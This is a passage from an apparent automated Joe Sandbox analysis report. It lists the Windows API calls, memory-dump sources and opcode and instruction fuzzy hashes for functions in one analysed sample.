                                                                                  • CreateThread.KERNEL32(00000000,?,001ECFF9,00000000,00000004,00000000), ref: 001ED218
                                                                                  • GetLastError.KERNEL32 ref: 001ED224
                                                                                  • __dosmaperr.LIBCMT ref: 001ED22B
                                                                                  • ResumeThread.KERNEL32(00000000), ref: 001ED249
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 173952441-0
                                                                                  • Opcode ID: baeee25ec549c156b88f9e170d6ad5c044440c02a57597679cc10998e7af9f01
                                                                                  • Instruction ID: 33cd15b74517ef1b7b8ee88ea25fec951d0dcc153f71e9644da36b60c1d9cc84
                                                                                  • Opcode Fuzzy Hash: baeee25ec549c156b88f9e170d6ad5c044440c02a57597679cc10998e7af9f01
                                                                                  • Instruction Fuzzy Hash: 84014936805A4ABFC7106BA7FC09BAE7B69DF91731F204258FA24920D0DF70C841C6A0
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
                                                                                  • GetStockObject.GDI32(00000011), ref: 001C6060
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3970641297-0
                                                                                  • Opcode ID: 04e85385610ecede8cf6548009294e48a5b3baf993f471078b1028075ef7696f
                                                                                  • Instruction ID: 97d78ee7130bc23fd52df9e83e599a9123398fdbebf6be5dd2fab19a4e3bc981
                                                                                  • Opcode Fuzzy Hash: 04e85385610ecede8cf6548009294e48a5b3baf993f471078b1028075ef7696f
                                                                                  • Instruction Fuzzy Hash: 5411AD72101608BFEF164FA49C48FEABB6DEF1C3A5F11021AFA0462010D736DC60DBA0
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 001E3B56
                                                                                    • Part of subcall function 001E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 001E3AD2
                                                                                    • Part of subcall function 001E3AA3: ___AdjustPointer.LIBCMT ref: 001E3AED
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 001E3B6B
                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 001E3B7C
                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 001E3BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 737400349-0
                                                                                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                  • Instruction ID: 3108efbc01920abbf91096040a203bcfd84678ce4e98cbf6c866c44b5f1516c9
                                                                                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                  • Instruction Fuzzy Hash: 90012932100589BBDF126E96CC46EEF3B6AEF98754F044014FE5896121C732E961EBA0
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001C13C6,00000000,00000000,?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue), ref: 001F30A5
                                                                                  • GetLastError.KERNEL32(?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue,00262290,FlsSetValue,00000000,00000364,?,001F2E46), ref: 001F30B1
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001F301A,001C13C6,00000000,00000000,00000000,?,001F328B,00000006,FlsSetValue,00262290,FlsSetValue,00000000), ref: 001F30BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: f45ec92e3ee21a206969372b7f676984619fd6c6890403cabfc6ab24103ce8d7
                                                                                  • Instruction ID: 797f90f7b345e76604fba4bdf7f87cb187c4d73c287fb027d185ca935a8617c7
                                                                                  • Opcode Fuzzy Hash: f45ec92e3ee21a206969372b7f676984619fd6c6890403cabfc6ab24103ce8d7
                                                                                  • Instruction Fuzzy Hash: 0201AC3271172AAFC7314B79AC48D7B77989F45BA1B214621FE25D7240DF31D941C6E0
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0022747F
                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00227497
                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002274AC
                                                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002274CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                                  • String ID:
                                                                                  • API String ID: 1352324309-0
                                                                                  • Opcode ID: c22c7a39bff6937771acf7ab76e2071afa750ab030be1df4f25dc41978c4be84
                                                                                  • Instruction ID: 04f24a099b8000a4e1f504db4c8a6ab1ce32ecbde37efd4996ad0c9547821ccf
                                                                                  • Opcode Fuzzy Hash: c22c7a39bff6937771acf7ab76e2071afa750ab030be1df4f25dc41978c4be84
                                                                                  • Instruction Fuzzy Hash: 5A11A1B5229321AFF7209F94FC08F927BFCEB00B00F108569A616D6151EBB0E914DB61
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0C4
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0E9
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B0F3
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0022ACD3,?,00008000), ref: 0022B126
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                  • String ID:
                                                                                  • API String ID: 2875609808-0
                                                                                  • Opcode ID: cfdc1995362058a66e6f437643162b11632f35fc0a34b1fd7a9c20e4ce8432f5
                                                                                  • Instruction ID: 48af020fdd5e02946d85ac06404037cbc2c2d112fcd05691f9a8d7ab57707901
                                                                                  • Opcode Fuzzy Hash: cfdc1995362058a66e6f437643162b11632f35fc0a34b1fd7a9c20e4ce8432f5
                                                                                  • Instruction Fuzzy Hash: D6116D31C21A3DEBDF01AFE4F9686EEBBB8FF09711F108096D945B2281DB7056608B55
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00222DC5
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00222DD6
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00222DDD
                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00222DE4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: a4adb17c6e1cc9c3207f336e6632c753aa7ef6d826ff189bbcef53273495e1b2
                                                                                  • Instruction ID: 4f04771abaa023bb39cc888452dd6534d697694ae9b523e030b0e4f21e786092
                                                                                  • Opcode Fuzzy Hash: a4adb17c6e1cc9c3207f336e6632c753aa7ef6d826ff189bbcef53273495e1b2
                                                                                  • Instruction Fuzzy Hash: 5BE06D72111334BBD7201BB2BC0DEEB3E6CEB83BA2F100015B105D1080AAA58944C6B0
                                                                                  APIs
                                                                                    • Part of subcall function 001D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
                                                                                    • Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96A2
                                                                                    • Part of subcall function 001D9639: BeginPath.GDI32(?), ref: 001D96B9
                                                                                    • Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96E2
                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00258887
                                                                                  • LineTo.GDI32(?,?,?), ref: 00258894
                                                                                  • EndPath.GDI32(?), ref: 002588A4
                                                                                  • StrokePath.GDI32(?), ref: 002588B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  • Opcode ID: 0b9c2308ab49ba7f48ccd417d9eed7810a4f20689506e28d14f0722debceb28f
                                                                                  • Instruction ID: 723c7f04813d1d1f13c6479d1bf988c32dd541ff217693cbd7c65735baf7da0c
                                                                                  • Opcode Fuzzy Hash: 0b9c2308ab49ba7f48ccd417d9eed7810a4f20689506e28d14f0722debceb28f
                                                                                  • Instruction Fuzzy Hash: 12F0343604135ABAEB126F94AC0EFCA3B69AF06312F148001FA21650E2C7B55525CBA9
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 001D98CC
                                                                                  • SetTextColor.GDI32(?,?), ref: 001D98D6
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 001D98E9
                                                                                  • GetStockObject.GDI32(00000005), ref: 001D98F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ModeObjectStockText
                                                                                  • String ID:
                                                                                  • API String ID: 4037423528-0
                                                                                  • Opcode ID: 14ef634291213fe90df7474fd8213d89c4897b2fad57687af2c529f74a94670e
                                                                                  • Instruction ID: 6092239e3c54c0a21f4f00ad6c1263bacd56708c6adb621ecfaeadf1d2957e4d
                                                                                  • Opcode Fuzzy Hash: 14ef634291213fe90df7474fd8213d89c4897b2fad57687af2c529f74a94670e
                                                                                  • Instruction Fuzzy Hash: E1E06D31244780AEDB215F78BC0DBE83F61AB52336F24C21AFAFA581E1D77146909B10
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 00221634
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,002211D9), ref: 0022163B
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002211D9), ref: 00221648
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,002211D9), ref: 0022164F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  • Opcode ID: b20d3d020cd7d813727016cf8f6e5546bf3b9db4c7eb11d7e33a162f9262b038
                                                                                  • Instruction ID: f1c5a6d4a3a1e7ed0f881e89e2bd7ca0218e2b576b251419ebc712eaafe606f7
                                                                                  • Opcode Fuzzy Hash: b20d3d020cd7d813727016cf8f6e5546bf3b9db4c7eb11d7e33a162f9262b038
                                                                                  • Instruction Fuzzy Hash: DEE04F71612322BFD7201FE0BD0DB5A3B6CAF54B92F244848F645C9080E6344450C758
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 0021D858
                                                                                  • GetDC.USER32(00000000), ref: 0021D862
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0021D882
                                                                                  • ReleaseDC.USER32(?), ref: 0021D8A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: b383a605dc64869b4a3660855a0f804c48cc0569a2a4e84be549eea0afbf4b2b
                                                                                  • Instruction ID: a4674299de0a725ac2f7451d6b78feb2a015c954689ed323d9d4d1b1c42ab34e
                                                                                  • Opcode Fuzzy Hash: b383a605dc64869b4a3660855a0f804c48cc0569a2a4e84be549eea0afbf4b2b
                                                                                  • Instruction Fuzzy Hash: F5E01AB0810304DFCF419FA0E80CA6DBBB5FB58312F208009F81AE7250D7388A42EF44
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 0021D86C
                                                                                  • GetDC.USER32(00000000), ref: 0021D876
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0021D882
                                                                                  • ReleaseDC.USER32(?), ref: 0021D8A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: c8d0791112d68cf338c4a4cf256fb0de67a1491060c2009e2310962ca89389a7
                                                                                  • Instruction ID: c1ad1640288a7cd0b0210ff0afa8a90400f44364ddeb4422e5341ff0abb8a877
                                                                                  • Opcode Fuzzy Hash: c8d0791112d68cf338c4a4cf256fb0de67a1491060c2009e2310962ca89389a7
                                                                                  • Instruction Fuzzy Hash: 6FE01A70800300DFCF409FA0E80C66DBBB5FB48312B208009F91AE7250D7385A01DF44
                                                                                  APIs
                                                                                    • Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625
                                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00234ED4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection_wcslen
                                                                                  • String ID: *$LPT
                                                                                  • API String ID: 1725874428-3443410124
                                                                                  • Opcode ID: 2c61c0ae1f9d72f77b8e2122e61be8d2cd839ba1d404ad7a96b30030edf5790d
                                                                                  • Instruction ID: 37d0304cca0b614a304f524548501360dc31ca063f1395cda9a8d2f8bfe7a684
                                                                                  • Opcode Fuzzy Hash: 2c61c0ae1f9d72f77b8e2122e61be8d2cd839ba1d404ad7a96b30030edf5790d
                                                                                  • Instruction Fuzzy Hash: 2E9160B5A102059FCB14DF58C484EA9BBF1BF54304F1880D9E40A9F7A2D775EE95CB90
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 001EE30D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  • Opcode ID: 7bfaed1864fa083946c18cf0e69a65af173697afcd2f03f3cd384276733175e9
                                                                                  • Instruction ID: 30e2e4296997f5788c524fd79314605fa39e61b4febcad43f930ff4ed44cf30c
                                                                                  • Opcode Fuzzy Hash: 7bfaed1864fa083946c18cf0e69a65af173697afcd2f03f3cd384276733175e9
                                                                                  • Instruction Fuzzy Hash: 0E51BD61A0CA4A96CB157B15DD013BE3BE4FF50740F348D69E1D6833E9EB318CD59A42
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(0021569E,00000000,?,0025CC08,?,00000000,00000000), ref: 002478DD
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • CharUpperBuffW.USER32(0021569E,00000000,?,0025CC08,00000000,?,00000000,00000000), ref: 0024783B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper$_wcslen
                                                                                  • String ID: <s(
                                                                                  • API String ID: 3544283678-3818342185
                                                                                  • Opcode ID: fe02c6d5ad5d45be9aaf20a63b0a29ba8b0369a64ca1f2dbd37ba4d5c4551b6a
                                                                                  • Instruction ID: 8fb78c8795e09c566fd565347145fc9328c199cef4432a156d3b445583af0566
                                                                                  • Opcode Fuzzy Hash: fe02c6d5ad5d45be9aaf20a63b0a29ba8b0369a64ca1f2dbd37ba4d5c4551b6a
                                                                                  • Instruction Fuzzy Hash: 8D615D32924119ABCF09EFE4DC91EFDB378BF38304B544529E552A7091EF709A15DBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: fecb65bc01bf920c399e5c48f011f3bd90f1f9ae5d713f824e3f34ccec617973
                                                                                  • Instruction ID: 4344b2eb55ca5512fcc03e56d384c130df8d8d5dc3979ac057fdebddb99d6b80
                                                                                  • Opcode Fuzzy Hash: fecb65bc01bf920c399e5c48f011f3bd90f1f9ae5d713f824e3f34ccec617973
